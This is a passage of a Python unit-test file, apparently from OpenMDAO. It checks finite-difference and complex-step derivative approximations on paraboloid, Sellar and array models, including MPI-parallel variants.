assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(sub._approx_schemes['fd']._exec_dict), 2)
def test_paraboloid_subbed_with_connections(self):
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0))
model.add_subsystem('p2', om.IndepVarComp('y', 0.0))
sub = model.add_subsystem('sub', om.Group())
sub.add_subsystem('bx', om.ExecComp('xout = xin'))
sub.add_subsystem('by', om.ExecComp('yout = yin'))
sub.add_subsystem('comp', Paraboloid())
model.connect('p1.x', 'sub.bx.xin')
model.connect('sub.bx.xout', 'sub.comp.x')
model.connect('p2.y', 'sub.by.yin')
model.connect('sub.by.yout', 'sub.comp.y')
model.linear_solver = om.ScipyKrylov()
sub.approx_totals()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['sub.comp.f_xy']
wrt = ['p1.x', 'p2.y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['sub.comp.f_xy', 'p1.x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['sub.comp.f_xy', 'p2.y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.bx.xin'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.by.yin'], [[8.0]], 1e-6)
# 3 outputs x 2 inputs
n_entries = 0
for k, v in sub._approx_schemes['fd']._exec_dict.items():
n_entries += len(v)
self.assertEqual(n_entries, 6)
def test_array_comp(self):
class DoubleArrayFD(DoubleArrayComp):
def compute_partials(self, inputs, partials):
"""
Override deriv calculation.
"""
pass
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x1', val=np.ones(2)))
model.add_subsystem('p2', om.IndepVarComp('x2', val=np.ones(2)))
comp = model.add_subsystem('comp', DoubleArrayFD())
model.connect('p1.x1', 'comp.x1')
model.connect('p2.x2', 'comp.x2')
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup()
prob.run_model()
model.run_linearize()
Jfd = model._jacobian
assert_near_equal(Jfd['comp.y1', 'p1.x1'], comp.JJ[0:2, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y1', 'p2.x2'], comp.JJ[0:2, 2:4], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p1.x1'], comp.JJ[2:4, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p2.x2'], comp.JJ[2:4, 2:4], 1e-6)
def test_implicit_component_fd(self):
# Somehow this wasn't tested in the original fd tests (which are mostly feature tests.)
class TestImplCompArrayDense(TestImplCompArray):
def setup(self):
super().setup()
self.declare_partials('*', '*', method='fd')
prob = om.Problem()
model = prob.model
model.add_subsystem('p_rhs', om.IndepVarComp('rhs', val=np.ones(2)))
sub = model.add_subsystem('sub', om.Group())
comp = sub.add_subsystem('comp', TestImplCompArrayDense())
model.connect('p_rhs.rhs', 'sub.comp.rhs')
model.linear_solver = om.ScipyKrylov()
prob.setup()
prob.run_model()
model.run_linearize()
Jfd = comp._jacobian
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.rhs'], -np.eye(2), 1e-6)
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.x'], comp.mtx, 1e-6)
def test_around_newton(self):
# For a group that is set to FD that has a Newton solver, make sure it doesn't
# try to FD itself while solving.
class TestImplCompArrayDenseNoSolve(TestImplCompArrayDense):
def solve_nonlinear(self, inputs, outputs):
""" Disable local solve."""
pass
prob = om.Problem()
model = prob.model
model.add_subsystem('p_rhs', om.IndepVarComp('rhs', val=np.array([2, 4])))
model.add_subsystem('comp', TestImplCompArrayDenseNoSolve())
model.connect('p_rhs.rhs', 'comp.rhs')
model.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup()
prob.run_model()
model.approx_totals()
assert_near_equal(prob['comp.x'], [1.97959184, 4.02040816], 1e-5)
model.run_linearize()
of = ['comp.x']
wrt = ['p_rhs.rhs']
Jfd = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(Jfd['comp.x', 'p_rhs.rhs'],
[[1.01020408, -0.01020408], [-0.01020408, 1.01020408]], 1e-5)
def test_step_size(self):
# Test makes sure option metadata propagates to the fd function
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
model.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
# Worse step so that our answer will be off a wee bit.
model.approx_totals(step=1e-2)
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-5.99]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.01]], 1e-6)
def test_unit_conv_group(self):
prob = om.Problem()
prob.model.add_subsystem('px1', om.IndepVarComp('x1', 100.0), promotes=['x1'])
sub1 = prob.model.add_subsystem('sub1', om.Group())
sub2 = prob.model.add_subsystem('sub2', om.Group())
sub1.add_subsystem('src', SrcComp())
sub2.add_subsystem('tgtF', TgtCompF())
sub2.add_subsystem('tgtC', TgtCompC())
sub2.add_subsystem('tgtK', TgtCompK())
prob.model.connect('x1', 'sub1.src.x1')
prob.model.connect('sub1.src.x2', 'sub2.tgtF.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtC.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtK.x2')
sub2.approx_totals(method='fd')
prob.setup()
prob.run_model()
assert_near_equal(prob['sub1.src.x2'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtF.x3'], 212.0, 1e-6)
assert_near_equal(prob['sub2.tgtC.x3'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtK.x3'], 373.15, 1e-6)
wrt = ['x1']
of = ['sub2.tgtF.x3', 'sub2.tgtC.x3', 'sub2.tgtK.x3']
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
# Check the total derivatives in reverse mode
prob.setup(check=False, mode='rev')
prob.run_model()
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
def test_sellar(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NonlinearBlockGS()
model.approx_totals(method='fd', step=1e-5)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
def test_desvar_with_indices(self):
# Just desvars on this one to cover code missed by desvar+response test.
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
# Derivatives
self.declare_partials('*', '*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
model.add_subsystem('x_param1', om.IndepVarComp('x1', np.ones((4))),
promotes=['x1'])
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1')
prob.set_solver_print(level=0)
model.approx_totals(method='fd')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][2][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][2][1], Jbase[2, 3], 1e-8)
def test_desvar_and_response_with_indices(self):
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
self.declare_partials(of='*', wrt='*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
model.add_subsystem('x_param1', om.IndepVarComp('x1', np.ones((4))),
promotes=['x1'])
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1', indices=[0, 2])
prob.set_solver_print(level=0)
model.approx_totals(method='fd')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][1][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][1][1], Jbase[2, 3], 1e-8)
def test_full_model_fd(self):
class DontCall(om.LinearRunOnce):
def solve(self, vec_names, mode, rel_systems=None):
raise RuntimeError("This solver should be ignored!")
class Simple(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=0.0)
self.declare_partials('y', 'x')
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = 4.0*x
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('comp', Simple(), promotes=['x', 'y'])
model.linear_solver = DontCall()
model.approx_totals()
model.add_design_var('x')
model.add_objective('y')
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['comp.y']
wrt = ['p1.x']
derivs = prob.driver._compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(derivs['comp.y']['p1.x'], [[4.0]], 1e-6)
def test_newton_with_densejac_under_full_model_fd(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model = om.Group(assembled_jac_type='dense')
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov(assemble_jac=True)
model.approx_totals(method='fd', step=1e-5)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
def test_newton_with_cscjac_under_full_model_fd(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov(assemble_jac=True)
model.approx_totals(method='fd', step=1e-5)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
def test_approx_totals_multi_input_constrained_desvar(self):
p = om.Problem()
indeps = p.model.add_subsystem('indeps', om.IndepVarComp(), promotes_outputs=['*'])
indeps.add_output('x', np.array([ 0.55994437, -0.95923447, 0.21798656, -0.02158783, 0.62183717,
0.04007379, 0.46044942, -0.10129622, 0.27720413, -0.37107886]))
indeps.add_output('y', np.array([ 0.52577864, 0.30894559, 0.8420792 , 0.35039912, -0.67290778,
-0.86236787, -0.97500023, 0.47739414, 0.51174103, 0.10052582]))
indeps.add_output('r', .7)
arctan_yox = om.ExecComp('g=arctan(y/x)', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10))
p.model.add_subsystem('arctan_yox', arctan_yox)
p.model.add_subsystem('circle', om.ExecComp('area=pi*r**2'))
p.model.add_subsystem('r_con', om.ExecComp('g=x**2 + y**2 - r', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10)))
p.model.connect('r', ('circle.r', 'r_con.r'))
p.model.connect('x', ['r_con.x', 'arctan_yox.x'])
p.model.connect('y', ['r_con.y', 'arctan_yox.y'])
p.model.approx_totals(method='cs')
p.model.add_design_var('x')
p.model.add_design_var('y')
p.model.add_design_var('r', lower=.5, upper=10)
p.model.add_constraint('y', equals=0, indices=[0,])
p.model.add_objective('circle.area', ref=-1)
p.setup(derivatives=True)
p.run_model()
# Formerly a KeyError
derivs = p.check_totals(compact_print=True, out_stream=None)
assert_near_equal(0.0, derivs['indeps.y', 'indeps.x']['abs error'][0])
# Coverage
derivs = p.driver._compute_totals(return_format='dict')
assert_near_equal(np.zeros((1, 10)), derivs['indeps.y']['indeps.x'])
def test_opt_with_linear_constraint(self):
# Test for a bug where we weren't re-initializing things in-between computing totals on
# linear constraints, and the nonlinear ones.
if OPT is None:
raise unittest.SkipTest("pyoptsparse is not installed")
if OPTIMIZER is None:
raise unittest.SkipTest("pyoptsparse is not providing SNOPT or SLSQP")
p = om.Problem()
indeps = p.model.add_subsystem('indeps', om.IndepVarComp(), promotes_outputs=['*'])
indeps.add_output('x', np.array([ 0.55994437, -0.95923447, 0.21798656, -0.02158783, 0.62183717,
0.04007379, 0.46044942, -0.10129622, 0.27720413, -0.37107886]))
indeps.add_output('y', np.array([ 0.52577864, 0.30894559, 0.8420792 , 0.35039912, -0.67290778,
-0.86236787, -0.97500023, 0.47739414, 0.51174103, 0.10052582]))
indeps.add_output('r', .7)
arctan_yox = om.ExecComp('g=arctan(y/x)', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10))
p.model.add_subsystem('arctan_yox', arctan_yox)
p.model.add_subsystem('circle', om.ExecComp('area=pi*r**2'))
p.model.add_subsystem('r_con', om.ExecComp('g=x**2 + y**2 - r', has_diag_partials=True,
g=np.ones(10), x=np.ones(10), y=np.ones(10)))
thetas = np.linspace(0, np.pi/4, 10)
p.model.add_subsystem('theta_con', om.ExecComp('g = x - theta', has_diag_partials=True,
g=np.ones(10), x=np.ones(10),
theta=thetas))
p.model.add_subsystem('delta_theta_con', om.ExecComp('g = even - odd', has_diag_partials=True,
g=np.ones(10//2), even=np.ones(10//2),
odd=np.ones(10//2)))
p.model.add_subsystem('l_conx', om.ExecComp('g=x-1', has_diag_partials=True, g=np.ones(10), x=np.ones(10)))
IND = np.arange(10, dtype=int)
ODD_IND = IND[1::2] # all odd indices
EVEN_IND = IND[0::2] # all even indices
p.model.connect('r', ('circle.r', 'r_con.r'))
p.model.connect('x', ['r_con.x', 'arctan_yox.x', 'l_conx.x'])
p.model.connect('y', ['r_con.y', 'arctan_yox.y'])
p.model.connect('arctan_yox.g', 'theta_con.x')
p.model.connect('arctan_yox.g', 'delta_theta_con.even', src_indices=EVEN_IND)
p.model.connect('arctan_yox.g', 'delta_theta_con.odd', src_indices=ODD_IND)
p.driver = pyOptSparseDriver()
p.driver.options['print_results'] = False
p.model.approx_totals(method='fd')
p.model.add_design_var('x')
p.model.add_design_var('y')
p.model.add_design_var('r', lower=.5, upper=10)
# nonlinear constraints
p.model.add_constraint('r_con.g', equals=0)
p.model.add_constraint('theta_con.g', lower=-1e-5, upper=1e-5, indices=EVEN_IND)
p.model.add_constraint('delta_theta_con.g', lower=-1e-5, upper=1e-5)
p.model.add_constraint('l_conx.g', equals=0, linear=False, indices=[0,])
p.model.add_constraint('y', equals=0, indices=[0,], linear=True)
p.model.add_objective('circle.area', ref=-1)
p.setup(mode='fwd', derivatives=True)
p.run_driver()
assert_near_equal(p['circle.area'], np.pi, 1e-6)
def test_bug_subsolve(self):
# There was a bug where a group with an approximation was still performing a linear
# solve on its subsystems, which led to partials declared with 'val' corrupting the
# results.
class DistParab(om.ExplicitComponent):
def initialize(self):
self.options.declare('arr_size', types=int, default=10,
desc="Size of input and output vectors.")
def setup(self):
arr_size = self.options['arr_size']
self.add_input('x', val=np.ones(arr_size))
self.add_output('f_xy', val=np.ones(arr_size))
self.declare_partials('f_xy', 'x')
def compute(self, inputs, outputs):
x = inputs['x']
outputs['f_xy'] = x**2
class NonDistComp(om.ExplicitComponent):
def initialize(self):
self.options.declare('arr_size', types=int, default=10,
desc="Size of input and output vectors.")
def setup(self):
arr_size = self.options['arr_size']
self.add_input('f_xy', val=np.ones(arr_size))
self.add_output('g', val=np.ones(arr_size))
# Make this wrong to see if it shows up in the answer.
mat = np.array([7.0, 13, 27])
row_col = np.arange(arr_size)
self.declare_partials('g', ['f_xy'], rows=row_col, cols=row_col, val=mat)
#self.declare_partials('g', ['f_xy'])
def compute(self, inputs, outputs):
x = inputs['f_xy']
outputs['g'] = x * np.array([3.5, -1.0, 5.0])
size = 3
prob = om.Problem()
model = prob.model
ivc = om.IndepVarComp()
ivc.add_output('x', np.ones((size, )))
model.add_subsystem('p', ivc, promotes=['*'])
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
sub.add_subsystem("parab", DistParab(arr_size=size), promotes=['*'])
sub.add_subsystem("ndp", NonDistComp(arr_size=size), promotes=['*'])
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_constraint('g', lower=0.0)
sub.approx_totals(method='fd')
prob.setup()
prob.run_model()
of = ['sub.ndp.g']
totals = prob.driver._compute_totals(of=of, wrt=['p.x'], return_format='dict')
assert_near_equal(totals['sub.ndp.g']['p.x'], np.diag([7.0, -2.0, 10.0]), 1e-6)
totals = prob.check_totals()
for key, val in totals.items():
assert_near_equal(val['rel error'][0], 0.0, 1e-6)
@unittest.skipUnless(MPI and PETScVector, "MPI and PETSc are required.")
class TestGroupFiniteDifferenceMPI(unittest.TestCase):
N_PROCS = 2
def test_indepvarcomp_under_par_sys(self):
prob = om.Problem()
prob.model = FanInSubbedIDVC()
prob.model.approx_totals()
prob.setup(local_vector_class=vector_class, check=False, mode='rev')
prob.set_solver_print(level=0)
prob.run_model()
J = prob.compute_totals(wrt=['sub.sub1.p1.x', 'sub.sub2.p2.x'], of=['sum.y'])
assert_near_equal(J['sum.y', 'sub.sub1.p1.x'], [[2.0]], 1.0e-6)
assert_near_equal(J['sum.y', 'sub.sub2.p2.x'], [[4.0]], 1.0e-6)
@unittest.skipUnless(MPI and PETScVector, "MPI and PETSc are required.")
class TestGroupCSMPI(unittest.TestCase):
N_PROCS = 2
def test_indepvarcomp_under_par_sys_par_cs(self):
prob = om.Problem()
prob.model = FanInSubbedIDVC(num_par_fd=2)
prob.model.approx_totals(method='cs')
prob.setup(local_vector_class=vector_class, check=False, mode='rev')
prob.set_solver_print(level=0)
prob.run_model()
J = prob.compute_totals(wrt=['sub.sub1.p1.x', 'sub.sub2.p2.x'], of=['sum.y'])
assert_near_equal(J['sum.y', 'sub.sub1.p1.x'], [[2.0]], 1.0e-6)
assert_near_equal(J['sum.y', 'sub.sub2.p2.x'], [[4.0]], 1.0e-6)
@unittest.skipUnless(MPI and PETScVector, "MPI and PETSc are required.")
class TestGroupFDMPI(unittest.TestCase):
N_PROCS = 2
def test_indepvarcomp_under_par_sys_par_fd(self):
prob = om.Problem()
prob.model = FanInSubbedIDVC(num_par_fd=2)
prob.model.approx_totals(method='fd')
prob.setup(local_vector_class=vector_class, check=False, mode='rev')
prob.set_solver_print(level=0)
prob.run_model()
J = prob.compute_totals(wrt=['sub.sub1.p1.x', 'sub.sub2.p2.x'], of=['sum.y'])
assert_near_equal(J['sum.y', 'sub.sub1.p1.x'], [[2.0]], 1.0e-6)
assert_near_equal(J['sum.y', 'sub.sub2.p2.x'], [[4.0]], 1.0e-6)
def title(txt):
""" Provide nice title for parameterized testing."""
return str(txt).split('.')[-1].replace("'", '').replace('>', '')
class TestGroupComplexStep(unittest.TestCase):
def setUp(self):
self.prob = om.Problem()
def tearDown(self):
# Global stuff seems to not get cleaned up if test fails.
try:
self.prob.model._outputs._under_complex_step = False
except Exception:
pass
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_paraboloid_'+'_'.join(title(a) for a in p.args))
def test_paraboloid(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
model.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='cs')
prob.setup(check=False, mode='fwd', local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(model._approx_schemes['cs']._exec_dict), 2)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_paraboloid_subbed_'+'_'.join(title(a) for a in p.args))
def test_paraboloid_subbed(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
sub = model.add_subsystem('sub', om.Group(), promotes=['x', 'y', 'f_xy'])
sub.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
sub.approx_totals(method='cs')
prob.setup(check=False, mode='fwd', local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.x'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(sub._approx_schemes['cs']._exec_dict), 2)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_parab_subbed_with_connections_'+'_'.join(title(a) for a in p.args))
def test_paraboloid_subbed_with_connections(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0))
model.add_subsystem('p2', om.IndepVarComp('y', 0.0))
sub = model.add_subsystem('sub', om.Group())
sub.add_subsystem('bx', om.ExecComp('xout = xin'))
sub.add_subsystem('by', om.ExecComp('yout = yin'))
sub.add_subsystem('comp', Paraboloid())
model.connect('p1.x', 'sub.bx.xin')
model.connect('sub.bx.xout', 'sub.comp.x')
model.connect('p2.y', 'sub.by.yin')
model.connect('sub.by.yout', 'sub.comp.y')
model.linear_solver = om.ScipyKrylov()
sub.approx_totals(method='cs')
prob.setup(check=False, mode='fwd', local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
of = ['sub.comp.f_xy']
wrt = ['p1.x', 'p2.y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['sub.comp.f_xy', 'p1.x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['sub.comp.f_xy', 'p2.y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.bx.xin'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.by.yin'], [[8.0]], 1e-6)
# 3 outputs x 2 inputs
n_entries = 0
for k, v in sub._approx_schemes['cs']._exec_dict.items():
n_entries += len(v)
self.assertEqual(n_entries, 6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_array_comp_'+'_'.join(title(a) for a in p.args))
def test_array_comp(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
class DoubleArrayFD(DoubleArrayComp):
def compute_partials(self, inputs, partials):
"""
Override deriv calculation.
"""
pass
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x1', val=np.ones(2)))
model.add_subsystem('p2', om.IndepVarComp('x2', val=np.ones(2)))
comp = model.add_subsystem('comp', DoubleArrayFD())
model.connect('p1.x1', 'comp.x1')
model.connect('p2.x2', 'comp.x2')
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.run_model()
model.run_linearize()
Jfd = model._jacobian
assert_near_equal(Jfd['comp.y1', 'p1.x1'], comp.JJ[0:2, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y1', 'p2.x2'], comp.JJ[0:2, 2:4], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p1.x1'], comp.JJ[2:4, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p2.x2'], comp.JJ[2:4, 2:4], 1e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_unit_conv_group_'+'_'.join(title(a) for a in p.args))
def test_unit_conv_group(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
prob.model.add_subsystem('px1', om.IndepVarComp('x1', 100.0), promotes=['x1'])
sub1 = prob.model.add_subsystem('sub1', om.Group())
sub2 = prob.model.add_subsystem('sub2', om.Group())
sub1.add_subsystem('src', SrcComp())
sub2.add_subsystem('tgtF', TgtCompF())
